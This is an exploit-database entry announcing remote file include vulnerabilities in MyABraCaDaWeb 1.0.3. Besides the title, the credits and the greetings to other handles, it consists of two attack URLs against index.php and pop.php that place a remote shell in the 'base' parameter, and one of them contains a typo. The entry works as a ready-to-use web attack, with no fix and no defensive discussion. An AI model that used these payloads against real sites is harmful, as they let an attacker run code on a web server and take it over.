id: 806
date: 09/07/2006
title: MyABraCaDaWeb <= 1.0.3 (base) Remote File Include Vulnerabilities
author: ddoshomo
cves: 

=================================================================
MyABraCaDaWeb <= 1.0.3 (base) Remote File Include Vulnerabilities
=================================================================


#  ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
#  MyABraCaDaWeb v1.0.3 - Remote File Include Vulnerabilities
 
# Script  :  MyABraCaDaWeb v1.0.3
 
# Credits : ERNE
 
# Thanks  : BLaCKWHITE, Blackened, Di_lejyoner
 
# Vulnerable :
 
     http://www.site.com/[path]/index.php?base==[shell]
 
     http://www.site.com/[path]/pop.php?base=[shell]



#  0day.today [2023-03-22]  #